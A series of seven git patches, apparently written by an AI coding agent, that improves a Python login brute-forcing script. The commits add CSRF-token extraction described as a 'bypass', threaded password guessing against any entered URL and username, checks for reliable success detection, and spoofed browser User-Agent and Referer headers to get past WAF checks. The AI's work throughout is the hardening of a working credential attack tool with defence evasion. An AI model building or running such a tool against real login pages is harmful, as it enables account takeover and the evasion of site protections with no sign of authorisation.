From b14050342d7e24cc019664e0e7674c4ffbcd6e1a Mon Sep 17 00:00:00 2001 From: "google-labs-jules[bot]" <161369871+google-labs-jules[bot]@users.noreply.github.com> Date: Wed, 28 Jan 2026 15:52:57 +0000 Subject: [PATCH 1/7] Improve bruteforce script to handle CSRF tokens and concurrency Co-authored-by: Antu7 <25433660+Antu7@users.noreply.github.com> --- bruteforce.py | 122 +++++++++++++++++++++++++++++++++----------------- 1 file changed, 80 insertions(+), 42 deletions(-) diff --git a/bruteforce.py b/bruteforce.py index b0d6a71..12feae2 100644 --- a/bruteforce.py +++ b/bruteforce.py @@ -26,22 +26,22 @@ import sys import re from bs4 import BeautifulSoup +from concurrent.futures import ThreadPoolExecutor class BruteForceCracker: - def __init__(self, url, username, error_message): + def __init__(self, url, username, error_message, username_field="UserName", password_field="Password"): self.url = url self.username = username self.error_message = error_message - self.session = requests.Session() + self.username_field = username_field + self.password_field = password_field - for run in banner: - sys.stdout.write(run) - sys.stdout.flush() - time.sleep(0.02) + # Display banner without sleep + print(banner) - def get_csrf_token(self): + def get_csrf_token(self, session): try: - response = self.session.get(self.url) + response = session.get(self.url) # Try to extract token using BeautifulSoup soup = BeautifulSoup(response.content, 'html.parser') @@ -60,53 +60,72 @@ def get_csrf_token(self): if match: return match.group(1), match.group(2) - print("Could not find CSRF token. The site might use a different method.") return None, None except Exception as e: print(f"Error getting CSRF token: {e}") return None, None def crack(self, password): + # Create a new session for each attempt to avoid threading issues and ensure fresh cookies + session = requests.Session() + # Get a fresh CSRF token for each attempt - token_name, token_value = self.get_csrf_token() + token_name, token_value = self.get_csrf_token(session) # Prepare the login data - data_dict = {"UserName": self.username, "Password": password, "Log In": "submit"} + data_dict = { + self.username_field: self.username, + self.password_field: password, + "Log In": "submit" + } # Add CSRF token if found if token_name and token_value: data_dict[token_name] = token_value - print(f"Using CSRF token: {token_name}={token_value[:10]}...") + # print(f"Using CSRF token: {token_name}={token_value[:10]}...") - # Make the login attempt - response = self.session.post(self.url, data=data_dict) + try: + # Make the login attempt + response = session.post(self.url, data=data_dict) - # Check if login was successful - if self.error_message in str(response.content): + # Check if login was successful + if self.error_message in str(response.content) or self.error_message in response.text: + return False + else: + print("\n[+] Success!") + print("Username: ---> " + self.username) + print("Password: ---> " + password) + return True + except Exception as e: + print(f"Request failed for {password}: {e}") return False - else: - print("\n[+] Success!") - print("Username: ---> " + self.username) - print("Password: ---> " + password) - return True - -def crack_passwords(passwords, cracker): - count = 0 - for password in passwords: - count += 1 - password = password.strip() - print(f"Trying Password: {count} Time For => {password}") - if cracker.crack(password): - return + +def crack_password_wrapper(password, cracker, counter_lock, counter): + password = password.strip() + with counter_lock: + counter[0] += 1 + count = counter[0] + if count % 10 == 0: + print(f"Trying Password: {count} => {password}") + + if cracker.crack(password): + return True + return False def main(): url = input("Enter Target Url: ") username = input("Enter Target Username: ") error = input("Enter Wrong Password Error Message: ") - print("\n[*] Checking if site uses CSRF protection...") - cracker = BruteForceCracker(url, username, error) - token_name, token_value = cracker.get_csrf_token() + user_field = input("Enter Username Field Name (default: UserName): ").strip() or "UserName" + pass_field = input("Enter Password Field Name (default: Password): ").strip() or "Password" + + print("\n[*] Initializing...") + cracker = BruteForceCracker(url, username, error, user_field, pass_field) + + # Test CSRF detection once + session = requests.Session() + token_name, token_value = cracker.get_csrf_token(session) if token_name and token_value: print(f"[+] CSRF token found: {token_name}") @@ -114,20 +133,39 @@ def main(): else: print("[-] No CSRF token found or using a different protection method\n") - with open("passwords.txt", "r") as f: - chunk_size = 1000 - while True: - passwords = f.readlines(chunk_size) - if not passwords: + passwords = [] + try: + with open("passwords.txt", "r") as f: + passwords = f.readlines() + except FileNotFoundError: + print("Error: passwords.txt not found.") + return + + print(f"Loaded {len(passwords)} passwords.") + + counter = [0] + counter_lock = threading.Lock() + found = False + + # Use ThreadPoolExecutor for better concurrency control + with ThreadPoolExecutor(max_workers=10) as executor: + futures = [] + for password in passwords: + if found: break + future = executor.submit(crack_password_wrapper, password, cracker, counter_lock, counter) + futures.append(future) + + for future in futures: + if future.result(): + found = True + print("Password found! Stopping other threads...") + executor.shutdown(wait=False, cancel_futures=True) break - t = threading.Thread(target=crack_passwords, args=(passwords, cracker)) - t.start() - t.join() if __name__ == '__main__': banner = """ Checking the Server !! [+]█████████████████████████████████████████████████[+] """ - print(banner) + # print(banner) # Moved to init to avoid duplication/delay issues main() \ No newline at end of file From 1285bf9fa2d9ec41a5f0204f84d4f6445f820277 Mon Sep 17 00:00:00 2001 From: "google-labs-jules[bot]" <161369871+google-labs-jules[bot]@users.noreply.github.com> Date: Wed, 28 Jan 2026 17:24:48 +0000 Subject: [PATCH 2/7] Fix bruteforce CSRF handling and concurrency Co-authored-by: Antu7 <25433660+Antu7@users.noreply.github.com> --- bruteforce.py | 80 ++++++++++++++++++++++++++++++++++----------------- 1 file changed, 53 insertions(+), 27 deletions(-) diff --git a/bruteforce.py b/bruteforce.py index 12feae2..794391c 100644 --- a/bruteforce.py +++ b/bruteforce.py @@ -26,7 +26,7 @@ import sys import re from bs4 import BeautifulSoup -from concurrent.futures import ThreadPoolExecutor +from concurrent.futures import ThreadPoolExecutor, as_completed class BruteForceCracker: def __init__(self, url, username, error_message, username_field="UserName", password_field="Password"): @@ -35,6 +35,7 @@ def __init__(self, url, username, error_message, username_field="UserName", pass self.error_message = error_message self.username_field = username_field self.password_field = password_field + self.csrf_detected = False # Display banner without sleep print(banner) @@ -62,7 +63,7 @@ def get_csrf_token(self, session): return None, None except Exception as e: - print(f"Error getting CSRF token: {e}") + # print(f"Error getting CSRF token: {e}") return None, None def crack(self, password): @@ -72,6 +73,11 @@ def crack(self, password): # Get a fresh CSRF token for each attempt token_name, token_value = self.get_csrf_token(session) + # If CSRF was detected initially but extraction failed here, assume failure/error + if self.csrf_detected and (not token_name or not token_value): + # print(f"[-] Failed to retrieve CSRF token for password: {password}") + return False + # Prepare the login data data_dict = { self.username_field: self.username, @@ -82,12 +88,15 @@ def crack(self, password): # Add CSRF token if found if token_name and token_value: data_dict[token_name] = token_value - # print(f"Using CSRF token: {token_name}={token_value[:10]}...") try: # Make the login attempt response = session.post(self.url, data=data_dict) + # Check status code first - 403 usually means CSRF failure or Forbidden + if response.status_code == 403 or response.status_code >= 500: + return False + # Check if login was successful if self.error_message in str(response.content) or self.error_message in response.text: return False @@ -97,7 +106,7 @@ def crack(self, password): print("Password: ---> " + password) return True except Exception as e: - print(f"Request failed for {password}: {e}") + # print(f"Request failed for {password}: {e}") return False def crack_password_wrapper(password, cracker, counter_lock, counter): @@ -105,12 +114,12 @@ def crack_password_wrapper(password, cracker, counter_lock, counter): with counter_lock: counter[0] += 1 count = counter[0] - if count % 10 == 0: - print(f"Trying Password: {count} => {password}") + if count % 50 == 0: + print(f"Tried {count} passwords...") if cracker.crack(password): - return True - return False + return True, password + return False, password def main(): url = input("Enter Target Url: ") @@ -130,42 +139,59 @@ def main(): if token_name and token_value: print(f"[+] CSRF token found: {token_name}") print("[*] Will attempt to bypass by extracting and including token with each request\n") + cracker.csrf_detected = True else: print("[-] No CSRF token found or using a different protection method\n") + cracker.csrf_detected = False - passwords = [] try: - with open("passwords.txt", "r") as f: - passwords = f.readlines() + f = open("passwords.txt", "r") except FileNotFoundError: print("Error: passwords.txt not found.") return - print(f"Loaded {len(passwords)} passwords.") - counter = [0] counter_lock = threading.Lock() + + batch_size = 100 + max_workers = 10 found = False - # Use ThreadPoolExecutor for better concurrency control - with ThreadPoolExecutor(max_workers=10) as executor: - futures = [] - for password in passwords: - if found: break - future = executor.submit(crack_password_wrapper, password, cracker, counter_lock, counter) - futures.append(future) - - for future in futures: - if future.result(): - found = True - print("Password found! Stopping other threads...") - executor.shutdown(wait=False, cancel_futures=True) + with ThreadPoolExecutor(max_workers=max_workers) as executor: + while True: + # Read a batch of passwords + batch = [] + for _ in range(batch_size): + line = f.readline() + if not line: + break + batch.append(line) + + if not batch: break + futures = {executor.submit(crack_password_wrapper, pwd, cracker, counter_lock, counter): pwd for pwd in batch} + + for future in as_completed(futures): + success, password = future.result() + if success: + found = True + print(f"Password found! Stopping...") + # Cancel remaining futures if possible (Python 3.9+) + if sys.version_info >= (3, 9): + executor.shutdown(wait=False, cancel_futures=True) + break + + if found: + break + + f.close() + if not found: + print("\n[-] Password not found in list.") + if __name__ == '__main__': banner = """ Checking the Server !! [+]█████████████████████████████████████████████████[+] """ - # print(banner) # Moved to init to avoid duplication/delay issues main() \ No newline at end of file From 3b3169a3efc6e505b75417cfb38ff1e2c3b24d8b Mon Sep 17 00:00:00 2001 From: "google-labs-jules[bot]" <161369871+google-labs-jules[bot]@users.noreply.github.com> Date: Wed, 28 Jan 2026 20:38:07 +0000 Subject: [PATCH 3/7] Fix bruteforce false positives and CSRF handling Co-authored-by: Antu7 <25433660+Antu7@users.noreply.github.com> --- bruteforce.py | 31 +++++++++++++++++++++++++------ 1 file changed, 25 insertions(+), 6 deletions(-) diff --git a/bruteforce.py b/bruteforce.py index 794391c..6b2fd48 100644 --- a/bruteforce.py +++ b/bruteforce.py @@ -25,6 +25,7 @@ import time import sys import re +import secrets from bs4 import BeautifulSoup from concurrent.futures import ThreadPoolExecutor, as_completed @@ -66,7 +67,7 @@ def get_csrf_token(self, session): # print(f"Error getting CSRF token: {e}") return None, None - def crack(self, password): + def crack(self, password, verbose=False): # Create a new session for each attempt to avoid threading issues and ensure fresh cookies session = requests.Session() @@ -98,12 +99,15 @@ def crack(self, password): return False # Check if login was successful + # Returns False (FAIL) if error message found + # Returns True (SUCCESS) if error message NOT found if self.error_message in str(response.content) or self.error_message in response.text: return False else: - print("\n[+] Success!") - print("Username: ---> " + self.username) - print("Password: ---> " + password) + if verbose: + print("\n[+] Success!") + print("Username: ---> " + self.username) + print("Password: ---> " + password) return True except Exception as e: # print(f"Request failed for {password}: {e}") @@ -117,7 +121,7 @@ def crack_password_wrapper(password, cracker, counter_lock, counter): if count % 50 == 0: print(f"Tried {count} passwords...") - if cracker.crack(password): + if cracker.crack(password, verbose=True): return True, password return False, password @@ -143,7 +147,22 @@ def main(): else: print("[-] No CSRF token found or using a different protection method\n") cracker.csrf_detected = False - + + # Pre-flight check to prevent false positives + print("[*] Verifying configuration with a random password...") + random_pass = secrets.token_hex(8) + if cracker.crack(random_pass, verbose=False): + print(f"\n[!] ERROR: False positive detected!") + print(f"[!] The script detected 'Success' for a known wrong password ('{random_pass}').") + print(f"[!] This means the Error Message you provided ('{error}') was NOT found in the server's response.") + print(f"[!] Please check:") + print(f" 1. Is the Error Message correct and exact?") + print(f" 2. Are the field names correct ({user_field}, {pass_field})?") + print(f" 3. Is the website returning the error in the HTML response body?") + return + else: + print("[+] Configuration verified. Error message was correctly found in the response.") + try: f = open("passwords.txt", "r") except FileNotFoundError: From 5de717e3502cd06df1fa18a6b6ab7faff53c6339 Mon Sep 17 00:00:00 2001 From: "google-labs-jules[bot]" <161369871+google-labs-jules[bot]@users.noreply.github.com> Date: Thu, 29 Jan 2026 04:37:13 +0000 Subject: [PATCH 4/7] Fix bruteforce script to bypass CSRF and improve detection - Added CSRF token extraction and session handling. - Implemented ThreadPoolExecutor for concurrency. - Added pre-flight check to validate error message configuration. - Added fallback logic to detect login failures using password field presence. - Allowed custom field names for username and password. Co-authored-by: Antu7 <25433660+Antu7@users.noreply.github.com> --- bruteforce.py | 42 +++++++++++++++++++++++++++++------------- 1 file changed, 29 insertions(+), 13 deletions(-) diff --git a/bruteforce.py b/bruteforce.py index 6b2fd48..98b7e9d 100644 --- a/bruteforce.py +++ b/bruteforce.py @@ -99,16 +99,28 @@ def crack(self, password, verbose=False): return False # Check if login was successful - # Returns False (FAIL) if error message found - # Returns True (SUCCESS) if error message NOT found - if self.error_message in str(response.content) or self.error_message in response.text: + # Strategy: + # 1. Check for specific error message (negative match) + # 2. Check if we are still on the login page by looking for the password field (fallback negative match) + + response_text = response.text + + if self.error_message in str(response.content) or self.error_message in response_text: + return False + + # If explicit error message not found, check if the response still contains a password input field. + # If it does, we likely just re-rendered the login page (failed login). + # This handles cases where the user-provided error message was typo'd or not visible in HTML source (e.g., hidden toaster). + if re.search(r']+type=["\']password["\']', response_text, re.I): return False - else: - if verbose: - print("\n[+] Success!") - print("Username: ---> " + self.username) - print("Password: ---> " + password) - return True + + # If we get here, neither the error message nor the password field was found. + # Assume success (redirected to dashboard, etc.) + if verbose: + print("\n[+] Success!") + print("Username: ---> " + self.username) + print("Password: ---> " + password) + return True except Exception as e: # print(f"Request failed for {password}: {e}") return False @@ -151,17 +163,21 @@ def main(): # Pre-flight check to prevent false positives print("[*] Verifying configuration with a random password...") random_pass = secrets.token_hex(8) + + # Use a fresh session for pre-flight check to simulate real attempt + # We essentially "crack" a known wrong password. + # If crack() returns True, it means it thinks the login was successful (False Positive). if cracker.crack(random_pass, verbose=False): print(f"\n[!] ERROR: False positive detected!") print(f"[!] The script detected 'Success' for a known wrong password ('{random_pass}').") - print(f"[!] This means the Error Message you provided ('{error}') was NOT found in the server's response.") + print(f"[!] This means the script could not detect the login failure.") print(f"[!] Please check:") - print(f" 1. Is the Error Message correct and exact?") + print(f" 1. Is the Error Message correct?") print(f" 2. Are the field names correct ({user_field}, {pass_field})?") - print(f" 3. Is the website returning the error in the HTML response body?") + print(f" 3. If the error is dynamic/hidden (e.g. toaster), the script fell back to checking for a password field but couldn't find one.") return else: - print("[+] Configuration verified. Error message was correctly found in the response.") + print("[+] Configuration verified. Login failure was correctly detected.") try: f = open("passwords.txt", "r") From 7744664b9ded0b0432c874cee2a9699f43e1f4f1 Mon Sep 17 00:00:00 2001 From: "google-labs-jules[bot]" <161369871+google-labs-jules[bot]@users.noreply.github.com> Date: Thu, 29 Jan 2026 05:00:37 +0000 Subject: [PATCH 5/7] Fix bruteforce script to bypass CSRF and improve detection - Added CSRF token extraction and session handling. - Implemented ThreadPoolExecutor for concurrency. - Added pre-flight check to validate error message configuration. - Added fallback logic to detect login failures using password field presence. - Allowed custom field names for username and password. - Updated output to show each username/password attempt. Co-authored-by: Antu7 <25433660+Antu7@users.noreply.github.com> --- bruteforce.py | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/bruteforce.py b/bruteforce.py index 98b7e9d..75ee942 100644 --- a/bruteforce.py +++ b/bruteforce.py @@ -129,9 +129,7 @@ def crack_password_wrapper(password, cracker, counter_lock, counter): password = password.strip() with counter_lock: counter[0] += 1 - count = counter[0] - if count % 50 == 0: - print(f"Tried {count} passwords...") + print(f"Trying: {cracker.username} : {password}") if cracker.crack(password, verbose=True): return True, password From b4e84a3f7e88fda2e49d5f92598e26cd4a097ae7 Mon Sep 17 00:00:00 2001 From: "google-labs-jules[bot]" <161369871+google-labs-jules[bot]@users.noreply.github.com> Date: Thu, 29 Jan 2026 05:18:10 +0000 Subject: [PATCH 6/7] Fix bruteforce script to bypass CSRF and improve detection - Added CSRF token extraction and session handling. - Implemented ThreadPoolExecutor for concurrency. - Added pre-flight check to validate error message configuration. - Added URL redirection check to robustly identify successful logins. - Added fallback logic to detect login failures using password field presence. - Allowed custom field names for username and password. - Updated output to show each username/password attempt. Co-authored-by: Antu7 <25433660+Antu7@users.noreply.github.com> --- bruteforce.py | 16 +++++++++++++++- 1 file changed, 15 insertions(+), 1 deletion(-) diff --git a/bruteforce.py b/bruteforce.py index 75ee942..8eecb3d 100644 --- a/bruteforce.py +++ b/bruteforce.py @@ -108,7 +108,21 @@ def crack(self, password, verbose=False): if self.error_message in str(response.content) or self.error_message in response_text: return False - # If explicit error message not found, check if the response still contains a password input field. + # Check for redirection + # Normalize URLs by stripping query parameters and trailing slashes + initial_url = self.url.split('?')[0].rstrip('/') + final_url = response.url.split('?')[0].rstrip('/') + + if initial_url != final_url: + # If we were redirected to a different path and didn't find the error message, assume success. + if verbose: + print(f"\n[+] Success! (Redirected to {final_url})") + print("Username: ---> " + self.username) + print("Password: ---> " + password) + return True + + # If explicit error message not found AND we are on the same URL path, + # check if the response still contains a password input field. # If it does, we likely just re-rendered the login page (failed login). # This handles cases where the user-provided error message was typo'd or not visible in HTML source (e.g., hidden toaster). if re.search(r']+type=["\']password["\']', response_text, re.I): From e5e48684e69040ecc3e793fa8ce20b2728da5e5f Mon Sep 17 00:00:00 2001 From: "google-labs-jules[bot]" <161369871+google-labs-jules[bot]@users.noreply.github.com> Date: Thu, 29 Jan 2026 08:39:05 +0000 Subject: [PATCH 7/7] Fix bruteforce script to bypass CSRF and improve detection - Added CSRF token extraction and session handling. - Implemented ThreadPoolExecutor for concurrency. - Added pre-flight check to validate error message configuration. - Added URL redirection check to robustly identify successful logins. - Added fallback logic to detect login failures using password field presence. - Allowed custom field names for username and password. - Updated output to show each username/password attempt. - Added User-Agent and Referer headers to bypass WAF/Framework checks. Co-authored-by: Antu7 <25433660+Antu7@users.noreply.github.com> --- bruteforce.py | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/bruteforce.py b/bruteforce.py index 8eecb3d..f04abd0 100644 --- a/bruteforce.py +++ b/bruteforce.py @@ -37,13 +37,16 @@ def __init__(self, url, username, error_message, username_field="UserName", pass self.username_field = username_field self.password_field = password_field self.csrf_detected = False + self.headers = { + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', + } # Display banner without sleep print(banner) def get_csrf_token(self, session): try: - response = session.get(self.url) + response = session.get(self.url, headers=self.headers) # Try to extract token using BeautifulSoup soup = BeautifulSoup(response.content, 'html.parser') @@ -91,8 +94,12 @@ def crack(self, password, verbose=False): data_dict[token_name] = token_value try: + # Prepare headers for the attempt + headers = self.headers.copy() + headers['Referer'] = self.url + # Make the login attempt - response = session.post(self.url, data=data_dict) + response = session.post(self.url, data=data_dict, headers=headers) # Check status code first - 403 usually means CSRF failure or Forbidden if response.status_code == 403 or response.status_code >= 500: